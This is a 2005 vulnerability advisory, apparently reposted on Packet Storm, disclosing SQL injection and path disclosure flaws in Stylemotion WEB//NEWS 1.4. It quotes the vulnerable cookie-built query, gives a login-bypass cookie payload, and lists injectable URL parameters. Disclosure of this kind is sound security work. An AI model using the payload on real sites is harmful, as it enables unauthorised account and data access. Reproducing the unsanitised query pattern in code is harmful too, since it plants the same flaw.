Stylemotion WEB//NEWS 1.4 is susceptible to SQL injection attacks.
a2a31cfe486c2f1c523356101f7d415a3e6965271142ca4ebf5a6536ce1d5362[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================
Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High
Date: Sep. 1 2005
Vendor: Stylemotion
Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net
Description:
============
WEB//News is a Newsscript which features like an CMS
Vulnerability:
==============
In the modules/startup.php
$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid)
WHERE
( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' )
LIMIT 1");
As we can see, the $_COOKIE paramter is not checked. Below i've added how you have to set the Cookies
to take advantage of these vulnerability (send this to index.php):
wn_userid=1; wn_userpw=0' OR '1'='1
Path Disclosure:
No file in he /actions dir is testet if it is directly included.
Example:
/actions/cat.add.php?name=A
Nearly every REQUEST variable is not checked so there are a few of SQL-Injections availiable
A few Examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]
Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed